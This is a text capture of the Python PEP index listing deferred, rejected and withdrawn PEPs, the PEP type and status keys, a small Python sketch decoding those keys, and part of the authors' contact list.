SD 368 | Standard image protocol and class | Lino Mastrodomenico | 2.6, 3.0
SD 400 | Deprecate codecs.StreamReader and codecs.StreamWriter | Victor Stinner | 3.3
SD 403 | General purpose decorator clause (aka “@in” clause) | Alyssa Coghlan | 3.4
PD 407 | New release cycle and introducing long-term support versions | Antoine Pitrou, Georg Brandl, Barry Warsaw
SD 419 | Protecting cleanup statements from interruptions | Paul Colomiets | 3.3
ID 423 | Naming conventions and recipes related to packaging | Benoit Bryon
ID 444 | Python Web3 Interface | Chris McDonough, Armin Ronacher
SD 447 | Add __getdescriptor__ method to metaclass | Ronald Oussoren
SD 491 | The Wheel Binary Package Format 1.9 | Daniel Holth
SD 499 | python -m foo should also bind ‘foo’ in sys.modules | Cameron Simpson, Chris Angelico, Joseph Jevnik | 3.10
SD 505 | None-aware operators | Mark E. Haase, Steve Dower | 3.8
SD 532 | A circuit breaking protocol and binary operators | Alyssa Coghlan, Mark E. Haase | 3.8
SD 533 | Deterministic cleanup for iterators | Nathaniel J. Smith
SD 534 | Improved Errors for Missing Standard Library Modules | Tomáš Orsava, Petr Viktorin, Alyssa Coghlan
SD 535 | Rich comparison chaining | Alyssa Coghlan | 3.8
SD 547 | Running extension modules using the -m option | Marcel Plch, Petr Viktorin | 3.7
SD 556 | Threaded garbage collection | Antoine Pitrou | 3.7
SD 568 | Generator-sensitivity for Context Variables | Nathaniel J. Smith | 3.8
SD 674 | Disallow using macros as l-values | Victor Stinner | 3.12
SD 734 | Multiple Interpreters in the Stdlib | Eric Snow | 3.13
SD 3124 | Overloading, Generic Functions, Interfaces, and Adaptation | Phillip J. Eby
SD 3143 | Standard daemon process library | Ben Finney | 3.x
SD 3150 | Statement local namespaces (aka “given” clause) | Alyssa Coghlan | 3.4
+
+
+

Rejected, Superseded, and Withdrawn PEPs

+ + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + +
PEP | Title | Authors | Python-Version
PW 3 | Guidelines for Handling Bug Reports | Jeremy Hylton
PW 9 | Sample Plaintext PEP Template | Barry Warsaw
PW 42 | Feature Requests | Jeremy Hylton
IS 102 | Doing Python Micro Releases | Anthony Baxter, Barry Warsaw, Guido van Rossum
IW 103 | Collecting information about git | Oleg Broytman
SR 204 | Range Literals | Thomas Wouters | 2.0
IW 206 | Python Advanced Library | A.M. Kuchling
SW 209 | Multi-dimensional Arrays | Paul Barrett, Travis Oliphant | 2.2
SR 210 | Decoupling the Interpreter Loop | David Ascher | 2.1
SR 211 | Adding A New Outer Product Operator | Greg Wilson | 2.1
SR 212 | Loop Counter Iteration | Peter Schneider-Kamp | 2.1
SS 215 | String Interpolation | Ka-Ping Yee | 2.1
IW 216 | Docstring Format | Moshe Zadka
IR 220 | Coroutines, Generators, Continuations | Gordon McMillan
SR 224 | Attribute Docstrings | Marc-André Lemburg | 2.1
SR 225 | Elementwise/Objectwise Operators | Huaiyu Zhu, Gregory Lielens | 2.1
SW 228 | Reworking Python’s Numeric Model | Moshe Zadka, Guido van Rossum
SR 231 | __findattr__() | Barry Warsaw | 2.1
SR 239 | Adding a Rational Type to Python | Christopher A. Craig, Moshe Zadka | 2.2
SR 240 | Adding a Rational Literal to Python | Christopher A. Craig, Moshe Zadka | 2.2
SS 241 | Metadata for Python Software Packages | A.M. Kuchling
SW 242 | Numeric Kinds | Paul F. Dubois | 2.2
SW 243 | Module Repository Upload Mechanism | Sean Reifschneider | 2.1
SR 244 | The directive statement | Martin von Löwis | 2.1
SR 245 | Python Interface Syntax | Michel Pelletier | 2.2
SR 246 | Object Adaptation | Alex Martelli, Clark C. Evans | 2.5
SR 254 | Making Classes Look More Like Types | Guido van Rossum | 2.2
SR 256 | Docstring Processing System Framework | David Goodger
SR 258 | Docutils Design Specification | David Goodger
SR 259 | Omit printing newline after newline | Guido van Rossum | 2.2
SR 262 | A Database of Installed Python Packages | A.M. Kuchling
SR 265 | Sorting Dictionaries by Value | Grant Griffin | 2.2
SW 266 | Optimizing Global Variable/Attribute Access | Skip Montanaro | 2.3
SR 268 | Extended HTTP functionality and WebDAV | Greg Stein | 2.x
SR 270 | uniq method for list objects | Jason Petrone | 2.2
SR 271 | Prefixing sys.path by command line option | Frédéric B. Giacometti | 2.2
SR 275 | Switching on Multiple Values | Marc-André Lemburg | 2.6
SR 276 | Simple Iterator for ints | Jim Althoff | 2.3
SR 281 | Loop Counter Iteration with range and xrange | Magnus Lie Hetland | 2.3
SR 284 | Integer for-loops | David Eppstein, Gregory Ewing | 2.3
SW 288 | Generators Attributes and Exceptions | Raymond Hettinger | 2.5
IS 291 | Backward Compatibility for the Python 2 Standard Library | Neal Norwitz | 2.3
SR 294 | Type Names in the types Module | Oren Tirosh | 2.5
SR 295 | Interpretation of multiline string constants | Stepan Koltsov | 3.0
SW 296 | Adding a bytes Object Type | Scott Gilbert | 2.3
SR 297 | Support for System Upgrades | Marc-André Lemburg | 2.6
SW 298 | The Locked Buffer Interface | Thomas Heller | 2.3
SR 299 | Special __main__() function in modules | Jeff Epler | 2.3
SR 303 | Extend divmod() for Multiple Divisors | Thomas Bellman | 2.3
SW 304 | Controlling Generation of Bytecode Files | Skip Montanaro
IW 306 | How to Change Python’s Grammar | Michael Hudson, Jack Diederich, Alyssa Coghlan, Benjamin Peterson
SR 310 | Reliable Acquisition/Release Pairs | Michael Hudson, Paul Moore | 2.4
SR 313 | Adding Roman Numeral Literals to Python | Mike Meyer | 2.4
SS 314 | Metadata for Python Software Packages 1.1 | A.M. Kuchling, Richard Jones | 2.5
SR 315 | Enhanced While Loop | Raymond Hettinger, W Isaac Carroll | 2.5
SR 317 | Eliminate Implicit Exception Instantiation | Steven Taschuk | 2.4
SR 319 | Python Synchronize/Asynchronize Block | Michel Pelletier | 2.4
SW 321 | Date/Time Parsing and Formatting | A.M. Kuchling | 2.4
SR 325 | Resource-Release Support for Generators | Samuele Pedroni | 2.4
SR 326 | A Case for Top and Bottom Values | Josiah Carlson, Terry Reedy | 2.4
SR 329 | Treating Builtins as Constants in the Standard Library | Raymond Hettinger | 2.4
SR 330 | Python Bytecode Verification | Michel Pelletier | 2.6
SR 332 | Byte vectors and String/Unicode Unification | Skip Montanaro | 2.5
SW 334 | Simple Coroutines via SuspendIteration | Clark C. Evans | 3.0
SR 335 | Overloadable Boolean Operators | Gregory Ewing | 3.3
SR 336 | Make None Callable | Andrew McClelland
IW 339 | Design of the CPython Compiler | Brett Cannon
SR 340 | Anonymous Block Statements | Guido van Rossum
SS 344 | Exception Chaining and Embedded Tracebacks | Ka-Ping Yee | 2.5
SS 345 | Metadata for Python Software Packages 1.2 | Richard Jones | 2.7
SW 346 | User Defined (“with”) Statements | Alyssa Coghlan | 2.5
SR 348 | Exception Reorganization for Python 3.0 | Brett Cannon
SR 349 | Allow str() to return unicode strings | Neil Schemenauer | 2.5
IR 350 | Codetags | Micah Elliott
SR 351 | The freeze protocol | Barry Warsaw
SS 354 | Enumerations in Python | Ben Finney | 2.6
SR 355 | Path - Object oriented filesystem paths | Björn Lindqvist | 2.5
SW 359 | The “make” Statement | Steven Bethard | 2.6
SR 363 | Syntax For Dynamic Attribute Access | Ben North
SW 364 | Transitioning to the Py3K Standard Library | Barry Warsaw | 2.6
SR 365 | Adding the pkg_resources module | Phillip J. Eby
SS 367 | New Super | Calvin Spealman, Tim Delaney | 2.6
SW 369 | Post import hooks | Christian Heimes | 2.6, 3.0
SR 377 | Allow __enter__() methods to skip the statement body | Alyssa Coghlan | 2.7, 3.1
SW 379 | Adding an Assignment Expression | Jervis Whitley | 2.7, 3.2
SW 381 | Mirroring infrastructure for PyPI | Tarek Ziadé, Martin von Löwis
SR 382 | Namespace Packages | Martin von Löwis | 3.2
SS 386 | Changing the version comparison module in Distutils | Tarek Ziadé
SR 390 | Static metadata for Distutils | Tarek Ziadé | 2.7, 3.2
SW 395 | Qualified Names for Modules | Alyssa Coghlan | 3.4
IW 396 | Module Version Numbers | Barry Warsaw
PR 401 | BDFL Retirement | Barry Warsaw, Brett Cannon
SR 402 | Simplified Package Layout and Partitioning | Phillip J. Eby | 3.3
SW 406 | Improved Encapsulation of Import State | Alyssa Coghlan, Greg Slodkowicz | 3.4
SR 408 | Standard library __preview__ package | Alyssa Coghlan, Eli Bendersky | 3.3
SR 410 | Use decimal.Decimal type for timestamps | Victor Stinner | 3.3
IS 411 | Provisional packages in the Python standard library | Alyssa Coghlan, Eli Bendersky | 3.3
PW 413 | Faster evolution of the Python Standard Library | Alyssa Coghlan
SR 416 | Add a frozendict builtin type | Victor Stinner | 3.3
SW 422 | Simpler customisation of class creation | Alyssa Coghlan, Daniel Urban | 3.5
IW 426 | Metadata for Python Software Packages 2.0 | Alyssa Coghlan, Daniel Holth, Donald Stufft
SS 431 | Time zone support improvements | Lennart Regebro
SW 432 | Restructuring the CPython startup sequence | Alyssa Coghlan, Victor Stinner, Eric Snow
SS 433 | Easier suppression of file descriptor inheritance | Victor Stinner | 3.4
SR 437 | A DSL for specifying signatures, annotations and argument converters | Stefan Krah | 3.4
SR 439 | Inclusion of implicit pip bootstrap in Python installation | Richard Jones | 3.4
SR 455 | Adding a key-transforming dictionary to collections | Antoine Pitrou | 3.5
SW 459 | Standard Metadata Extensions for Python Software Packages | Alyssa Coghlan
SW 460 | Add binary interpolation and formatting | Antoine Pitrou | 3.5
PW 462 | Core development workflow automation for CPython | Alyssa Coghlan
SR 463 | Exception-catching expressions | Chris Angelico | 3.5
SW 469 | Migration of dict iteration code to Python 3 | Alyssa Coghlan | 3.5
SR 472 | Support for indexing with keyword arguments | Stefano Borini, Joseph Martinot-Lagarde | 3.6
SR 473 | Adding structured data to built-in exceptions | Sebastian Kreft
PW 474 | Creating forge.python.org | Alyssa Coghlan
PW 481 | Migrate CPython to Git, Github, and Phabricator | Donald Stufft
SR 490 | Chain exceptions at C level | Victor Stinner | 3.6
IR 496 | Environment Markers | James Polley
PR 497 | A standard mechanism for backward compatibility | Ed Schofield
SR 500 | A protocol for delegating datetime methods to their tzinfo implementations | Alexander Belopolsky, Tim Peters
SW 501 | General purpose template literal strings | Alyssa Coghlan, Nick Humrich | 3.12
IR 502 | String Interpolation - Extended Discussion | Mike G. Miller | 3.6
SW 504 | Using the System RNG by default | Alyssa Coghlan | 3.6
PR 507 | Migrate CPython to Git and GitLab | Barry Warsaw
SS 509 | Add a private version to dict | Victor Stinner | 3.6
SR 510 | Specialize functions with guards | Victor Stinner | 3.6
SR 511 | API for code transformers | Victor Stinner | 3.6
IS 513 | A Platform Tag for Portable Linux Built Distributions | Robert T. McGibbon, Nathaniel J. Smith
SR 516 | Build system abstraction for pip/conda etc | Robert Collins, Nathaniel J. Smith
SW 521 | Managing global context via ‘with’ blocks in generators and coroutines | Nathaniel J. Smith | 3.6
SR 522 | Allow BlockingIOError in security sensitive APIs | Alyssa Coghlan, Nathaniel J. Smith | 3.6
SW 531 | Existence checking operators | Alyssa Coghlan | 3.7
SW 536 | Final Grammar for Literal String Interpolation | Philipp Angerer | 3.7
SR 542 | Dot Notation Assignment In Function Header | Markus Meskanen
SW 543 | A Unified TLS API for Python | Cory Benfield, Christian Heimes | 3.7
SR 546 | Backport ssl.MemoryBIO and ssl.SSLObject to Python 2.7 | Victor Stinner, Cory Benfield | 2.7
SR 548 | More Flexible Loop Control | R David Murray | 3.7
SR 549 | Instance Descriptors | Larry Hastings | 3.7
SW 550 | Execution Context | Yury Selivanov, Elvis Pranskevichus | 3.7
IW 551 | Security transparency in the Python runtime | Steve Dower | 3.7
SS 554 | Multiple Interpreters in the Stdlib | Eric Snow | 3.13
SW 555 | Context-local variables (contextvars) | Koos Zevenhoven | 3.7
SW 558 | Defined semantics for locals() | Alyssa Coghlan | 3.13
SR 559 | Built-in noop() | Barry Warsaw | 3.7
IS 571 | The manylinux2010 Platform Tag | Mark Williams, Geoffrey Thomas, Thomas Kluyver
SW 575 | Unifying function/method classes | Jeroen Demeyer | 3.8
SW 576 | Rationalize Built-in function classes | Mark Shannon | 3.8
SW 577 | Augmented Assignment Expressions | Alyssa Coghlan | 3.8
SR 580 | The C call protocol | Jeroen Demeyer | 3.8
SR 582 | Python local packages directory | Kushal Das, Steve Dower, Donald Stufft, Alyssa Coghlan | 3.12
IW 583 | A Concurrency Memory Model for Python | Jeffrey Yasskin
IW 595 | Improving bugs.python.org | Ezio Melotti, Berker Peksag
IW 598 | Introducing incremental feature releases | Alyssa Coghlan | 3.9
IS 599 | The manylinux2014 Platform Tag | Dustin Ingram
SR 601 | Forbid return/break/continue breaking out of finally | Damien George, Batuhan Taskaya | 3.8
IR 605 | A rolling feature release stream for CPython | Steve Dower, Alyssa Coghlan | 3.9
SR 606 | Python Compatibility Version | Victor Stinner | 3.9
SR 608 | Coordinated Python release | Miro Hrončok, Victor Stinner | 3.9
SW 611 | The one million limit | Mark Shannon
SW 620 | Hide implementation details from the C API | Victor Stinner | 3.12
SS 622 | Structural Pattern Matching | Brandt Bucher, Daniel F Moisset, Tobias Kohn, Ivan Levkivskyi, Guido van Rossum, Talin | 3.10
SS 631 | Dependency specification in pyproject.toml based on PEP 508 | Ofek Lev
SR 633 | Dependency specification in pyproject.toml using an exploded TOML table | Laurie Opperman, Arun Babu Neelicattu
SR 637 | Support for indexing with keyword arguments | Stefano Borini | 3.10
SR 640 | Unused variable syntax | Thomas Wouters | 3.10
SR 641 | Using an underscore in the version portion of Python 3.10 compatibility tags | Brett Cannon, Steve Dower, Barry Warsaw | 3.10
SR 642 | Explicit Pattern Syntax for Structural Pattern Matching | Alyssa Coghlan | 3.10
SW 645 | Allow writing optional types as x? | Maggie Moss
SR 648 | Extensible customizations of the interpreter at startup | Mario Corchero | 3.11
SW 650 | Specifying Installer Requirements for Python Projects | Vikram Jayanthi, Dustin Ingram, Brett Cannon
SR 651 | Robust Stack Overflow Handling | Mark Shannon
SR 662 | Editable installs via virtual wheels | Bernát Gábor
IR 663 | Standardizing Enum str(), repr(), and format() behaviors | Ethan Furman | 3.11
SR 665 | A file format to list Python dependencies for reproducibility of an application | Brett Cannon, Pradyun Gedam, Tzu-ping Chung
SR 666 | Reject Foolish Indentation | Laura Creighton | 2.2
SR 677 | Callable Type Syntax | Steven Troxler, Pradeep Kumar Srinivasan | 3.11
SR 690 | Lazy Imports | Germán Méndez Bravo, Carl Meyer | 3.12
SW 704 | Require virtual environments by default for package installers | Pradyun Gedam
SR 707 | A simplified signature for __exit__ and __aexit__ | Irit Katriel | 3.12
SR 712 | Adding a “converter” parameter to dataclasses.field | Joshua Cannon | 3.13
SR 713 | Callable Modules | Amethyst Reese | 3.12
SR 722 | Dependency specification for single-file scripts | Paul Moore
SW 724 | Stricter Type Guards | Rich Chiodo, Eric Traut, Erik De Bonte | 3.13
SR 726 | Module __setattr__ and __delattr__ | Sergey B Kirpichev | 3.13
SR 754 | IEEE 754 Floating Point Special Values | Gregory R. Warnes | 2.3
SW 756 | Add PyUnicode_Export() and PyUnicode_Import() C functions | Victor Stinner | 3.14
SW 760 | No More Bare Excepts | Pablo Galindo, Brett Cannon | 3.14
PW 3001 | Procedure for reviewing and improving standard library modules | Georg Brandl
SR 3103 | A Switch/Case Statement | Guido van Rossum | 3.0
SR3117Postfix type declarationsGeorg Brandl3.0
SR3122Delineation of the main moduleBrett Cannon
SR3125Remove Backslash ContinuationJim J. Jewett
SR3126Remove Implicit String ConcatenationJim J. Jewett, Raymond Hettinger
SR3128BList: A Faster List-like TypeDaniel Stutzbach2.6, 3.0
SR3130Access to Current Module/Class/FunctionJim J. Jewett3.0
SR3133Introducing RolesCollin Winter3.0
SR3136Labeled break and continueMatt Chisholm3.1
SR3139Cleaning out sys and the “interpreter” moduleBenjamin Peterson3.0
SR3140str(container) should call str(item), not repr(item)Oleg Broytman, Jim J. Jewett
SR3142Add a “while” clause to generator expressionsGerald Britton3.0
SW3145Asynchronous I/O For subprocess.PopenEric Pruitt, Charles R. McCreary, Josiah Carlson3.2
SW3146Merging Unladen Swallow into CPythonCollin Winter, Jeffrey Yasskin, Reid Kleckner3.3
SR3152CofunctionsGregory Ewing3.3
SS3153Asynchronous IO supportLaurens Van Houtven
IR8010The Technical Leader Governance ModelBarry Warsaw
IR8011Python Governance Model Lead by Trio of PythonistasMariatta, Barry Warsaw
IR8012The Community Governance ModelŁukasz Langa
IR8013The External Council Governance ModelSteve Dower
IR8014The Commons Governance ModelJack Jansen
IR8015Organization of the Python communityVictor Stinner

Reserved PEP Numbers

PEP | Title | Authors
801 | RESERVED | Warsaw

PEP Types Key

• I (Informational): Non-normative PEP containing background, guidelines or other information relevant to the Python ecosystem
• P (Process): Normative PEP describing or proposing a change to a Python community process, workflow or governance
• S (Standards Track): Normative PEP with a new feature for Python, implementation change for CPython or interoperability standard for the ecosystem

More info in PEP 1.


PEP Status Key

• A (Accepted): Normative proposal accepted for implementation
• A (Active): Currently valid informational guidance, or an in-use process
• D (Deferred): Inactive draft that may be taken up again at a later time
• <No letter> (Draft): Proposal under active discussion and revision
• F (Final): Accepted and implementation complete, or no longer active
• P (Provisional): Provisionally accepted but additional feedback needed
• R (Rejected): Formally declined and will not be accepted
• S (Superseded): Replaced by another succeeding PEP
• W (Withdrawn): Removed from consideration by sponsor or authors

More info in PEP 1.
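
Read together, the two keys mean that each entry's letter pair decodes mechanically: the first letter gives the PEP type, and the optional second letter gives its status. A minimal illustrative Python sketch follows; the dictionaries and the decode helper are hypothetical (not part of the PEPs site tooling) and simply restate the two keys above:

PEP_TYPES = {
    "I": "Informational",
    "P": "Process",
    "S": "Standards Track",
}

PEP_STATUSES = {
    "A": "Accepted/Active",  # the key lists "A" for both; context disambiguates
    "D": "Deferred",
    "F": "Final",
    "P": "Provisional",
    "R": "Rejected",
    "S": "Superseded",
    "W": "Withdrawn",
    "": "Draft",             # no status letter means Draft
}

def decode(code: str) -> tuple[str, str]:
    """Split an index code like 'SF' or 'S' into (type, status) names."""
    return PEP_TYPES[code[0]], PEP_STATUSES[code[1:]]

assert decode("SF") == ("Standards Track", "Final")
assert decode("S") == ("Standards Track", "Draft")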


Authors/Owners

Name | Email Address
A.M. Kuchling | amk at amk.ca
Aahz | aahz at pythoncraft.com
Adam Turner | python at quite.org.uk
Adrian Garcia Badaracco | adrian at adriangb.com
Alex Gaynor | alex.gaynor at gmail.com
Alex Martelli | aleaxit at gmail.com
Alexander Belopolsky | alexander.belopolsky at gmail.com
Alexandre Vassalotti | alexandre at peadrop.com
Alexis Challande | alexis.challande at trailofbits.com
Alice Purcell | alicederyn at gmail.com
Alyssa Coghlan | ncoghlan at gmail.com
Amethyst Reese | amethyst at n7.gg
Ammar Askar | ammar at ammaraskar.com
Andre Roberge | andre.roberge at gmail.com
Andrew McClelland | eternalsquire at comcast.net
Andrew McNamara | andrewm at object-craft.com.au
Anthony Baxter | anthony at interlink.com.au
Antoine Pitrou | solipsis at pitrou.net
Armin Ronacher | armin.ronacher at active-4.com
Arun Babu Neelicattu | arun.neelicattu at gmail.com
Atsuo Ishimoto | ishimoto at gembook.org
Barry Warsaw | barry at python.org
Batuhan Taskaya | batuhan at python.org
Ben Finney | ben+python at benfinney.id.au
Ben Hoyt | benhoyt at gmail.com
Ben North | ben at redfrontdoor.org
Benjamin Peterson | benjamin at python.org
Benoit Bryon | benoit at marmelune.net
Berker Peksag | berker.peksag at gmail.com
Bernát Gábor | gaborjbernat at gmail.com
Björn Lindqvist | bjourne at gmail.com
Brandt Bucher | brandt at python.org
Brett Cannon | brett at python.org
Brian Quinlan | brian at sweetapp.com
C.A.M. Gerlach | cam.gerlach at gerlach.cam
Calvin Spealman | ironfroggy at gmail.com
Cameron Simpson | cs at cskk.id.au
Carl Banks | pythondev at aerojockey.com
Carl Friedrich Bolz-Tereick | cfbolz at gmx.de
Carl Meyer | carl at oddbird.net
Carol Willing | willingc at gmail.com
Charles R. McCreary |
Charles-François Natali | cf.natali at gmail.com
Chris Angelico | rosuav at gmail.com
Chris Jerdonek | chris.jerdonek at gmail.com
Chris McDonough | chrism at plope.com
Christian Heimes | christian at python.org
Christian R. Reis | kiko at async.com.br
Christopher A. Craig | python-pep at ccraig.org
Christopher Barker | pythonchb at gmail.com
Clark C. Evans | cce at clarkevans.com
Cliff Wells | logiplexsoftware at earthlink.net
Collin Winter | collinwinter at google.com
Cooper Lees | me at cooperlees.com
Cory Benfield | cory at lukasa.co.uk
Damien George |
Daniel F Moisset | dfmoisset at gmail.com
Daniel Holth | dholth at gmail.com
Daniel Stutzbach | daniel at stutzbachenterprises.com
Daniel Urban | urban.dani+py at gmail.com
Dave Cole | djc at object-craft.com.au
Dave Peck | davepeck at davepeck.org
David Ascher | davida at activestate.com
David Eppstein | eppstein at ics.uci.edu
David Foster | david at dafoster.net
David Goodger | goodger at python.org
David Hewitt | 1939362+davidhewitt at users.noreply.github.com
David Woods | dw-git at d-woods.co.uk
Dennis Sweeney | sweeney.dennis650 at gmail.com
Dino Viehland | dinov at microsoft.com
Dirkjan Ochtman | dirkjan at ochtman.nl
Domenico Andreoli | domenico.andreoli at linux.com
Donald Stufft | donald at stufft.io
Donghee Na | donghee.na at python.org
Doug Hellmann | doug at doughellmann.com
Dustin Ingram | di at python.org
Ed Schofield | ed at pythoncharmers.com
Eddie Elizondo | eduardo.elizondorueda at gmail.com
Ee Durbin | ee at python.org
Elana Hashman | ehashman at debian.org
Eli Bendersky | eliben at gmail.com
Elvis Pranskevichus | elvis at edgedb.com
Emily Morehouse-Valcarcel | emily at python.org
Eneg | eneg at discuss.python.org
Eric N. Vander Weele | ericvw at gmail.com
Eric Pruitt |
Eric Snow | ericsnowcurrently at gmail.com
Eric Traut | erictr at microsoft.com
Eric V. Smith | eric at trueblade.com
Erik De Bonte | erikd at microsoft.com
Erik M. Bray |
Erlend Egeberg Aasland | erlend at python.org
Ethan Furman | ethan at stoneleaf.us
Ethan Smith | ethan at ethanhs.me
Ewa Jodlowska | ewa at python.org
Ezio Melotti | ezio.melotti at gmail.com
Facundo Batista | facundo at taniquetil.com.ar
Facundo Tuesca | facundo.tuesca at trailofbits.com
Filipe Laíns | lains at riseup.net
Franek Magiera | framagie at gmail.com
Fred L. Drake, Jr. | fred at fdrake.net
Frédéric B. Giacometti | fred at arakne.com
Fridolín Pokorný | fridolin.pokorny at gmail.com
Geoffrey Thomas | geofft at ldpreload.com
Georg Brandl | georg at python.org
Gerald Britton | gerald.britton at gmail.com
Germán Méndez Bravo | german.mb at gmail.com
Gordon McMillan | gmcm at hypernet.com
Graham Bleaney | gbleaney at gmail.com
Grant Griffin | g2 at iowegian.com
Greg Slodkowicz | jergosh at gmail.com
Greg Stein | gstein at lyra.org
Greg Wilson | gvwilson at ddj.com
Gregory Ewing | greg.ewing at canterbury.ac.nz
Gregory Lielens | gregory.lielens at fft.be
Gregory P. Smith | greg at krypto.org
Gregory R. Warnes | gregory_r_warnes at groton.pfizer.com
Guido van Rossum | guido at python.org
Holger Krekel | holger at merlinux.eu
Huaiyu Zhu | hzhu at users.sourceforge.net
Hugo van Kemenade |
Inada Naoki | songofacandy at gmail.com
Irit Katriel | irit at python.org
Ivan Levkivskyi | levkivskyi at gmail.com
Ivona Stojanovic | stojanovic.i at hotmail.com
Jack Diederich | jackdied at gmail.com
Jack Jansen | jack at cwi.nl
James C. Ahlstrom | jim at interet.com
James Hilton-Balfe | gobot1234yt at gmail.com
James Polley | jp at jamezpolley.com
Jason Orendorff | jason.orendorff at gmail.com
Jason Petrone | jp at demonseed.net
Jeff Epler | jepler at unpythonic.net
Jeffrey Yasskin | jyasskin at google.com
Jelle Zijlstra | jelle.zijlstra at gmail.com
Jeremy Hylton | jeremy at alum.mit.edu
Jeroen Demeyer | j.demeyer at ugent.be
Jervis Whitley | jervisau at gmail.com
Jesse Noller | jnoller at gmail.com
Jim Althoff | james_althoff at i2.com
Jim Baker | jim.baker at python.org
Jim J. Jewett | jimjjewett at gmail.com
Jiwon Seo | seojiwon at gmail.com
Joanna Jablonski |
Joe Carey | joe at python.org
John Belmonte | john at neggie.net
Jonathan Riehl | jriehl at spaceship.com
Joop van de Pol | joop.vandepol at trailofbits.com
Joseph Jevnik | joejev at gmail.com
Joseph Martinot-Lagarde |
Joshua Bambrick | jbambrick at google.com
Joshua Cannon | joshdcannon at gmail.com
Joshua Landau | joshua at landau.ws
Joshua Lock | jlock at vmware.com
Joshua Xu | jxu425 at fb.com
Josiah Carlson | jcarlson at uci.edu
Jukka Lehtosalo | jukka.lehtosalo at iki.fi
Julien Palard | julien at palard.fr
Just van Rossum | just at letterror.com
Justin Cappos | jcappos at nyu.edu
Ka-Ping Yee | ping at zesty.ca
Karl Nelson | nelson85 at llnl.gov
Karolina Surma | karolina.surma at gazeta.pl
Ken Jin | kenjin at python.org
Kerrick Staley | mail at kerrickstaley.com
Kevin Altis | altis at semi-retired.com
Kevin D. Smith | kevin.smith at themorgue.org
Konstantin Kashin | kkashin at fb.com
Koos Zevenhoven | k7hoven at gmail.com
Koudai Aono | koxudaxi at gmail.com
Kushal Das | mail at kushaldas.in
Larry Hastings | larry at hastings.org
Laura Creighton | lac at strakt.com
Laurens Van Houtven | _ at lvh.cc
Laurie Opperman | laurie_opperman at hotmail.com
Lennart Regebro | regebro at gmail.com
Lie Ryan | lie.1296 at gmail.com
Lino Mastrodomenico | l.mastrodomenico at gmail.com
Lisa Roach | lisaroach14 at gmail.com
Lois Anne DeLong | lad278 at nyu.edu
Lukas Puehringer | lukas.puehringer at nyu.edu
Lysandros Nikolaou | lisandrosnik at gmail.com
Maggie Moss | maggiebmoss at gmail.com
Magnus Lie Hetland | magnus at hetland.org
Malcolm Smith | smith at chaquo.com
Marc-Andre Lemburg | mal at lemburg.com
Marc-André Lemburg | mal at lemburg.com
Marcel Plch | gmarcel.plch at gmail.com
Mariatta | mariatta at python.org
Marina Moore | mm9693 at nyu.edu
Mario Corchero | mariocj89 at gmail.com
Mark E. Haase | mehaase at gmail.com
Mark Hammond | mhammond at skippinet.com.au
Mark Mendoza | mendoza.mark.a at gmail.com
Mark Shannon | mark at hotpy.org
Mark Williams | mrw at enotuniq.org
Markus Meskanen | markusmeskanen at gmail.com
Marta Gómez Macías | cyberwitch at google.com
Martijn Faassen | faassen at infrae.com
Martin Teichmann | lkb.teichmann at gmail.com
Martin von Löwis | martin at v.loewis.de
Masayuki Yamamoto |
Matt Chisholm | matt-python at theory.org
Matt Wozniski | godlygeek at gmail.com
Matthew Rahtz | mrahtz at google.com
Matthias Klose | doko at ubuntu.com
Micah Elliott | mde at tracos.org
Michael Foord | michael at python.org
Michael Hudson | mwh at python.net
Michael J. Sullivan | sully at msully.net
Michael Lee | michael.lee.0x2a at gmail.com
Michael P. Dubner | dubnerm at mindless.com
Michael Sarahan | msarahan at gmail.com
Michel Pelletier | michel at users.sourceforge.net
Mike G. Miller |
Mike Meyer | mwm at mired.org
Mike Verdone | mike.verdone at gmail.com
Miro Hrončok | miro at hroncok.cz
Moshe Zadka | moshez at zadka.site.co.il
Nathaniel J. Smith | njs at pobox.com
Neal Norwitz | nnorwitz at gmail.com
Ned Deily | nad at python.org
Neil Hodgson | neilh at scintilla.org
Neil Schemenauer | nas at arctrix.com
Nick Humrich | nick at humrich.us
Ofek Lev | ofekmeister at gmail.com
Oleg Broytman | phd at phdru.name
Oren Tirosh | oren at hishome.net
Pablo Galindo | pablogsal at python.org
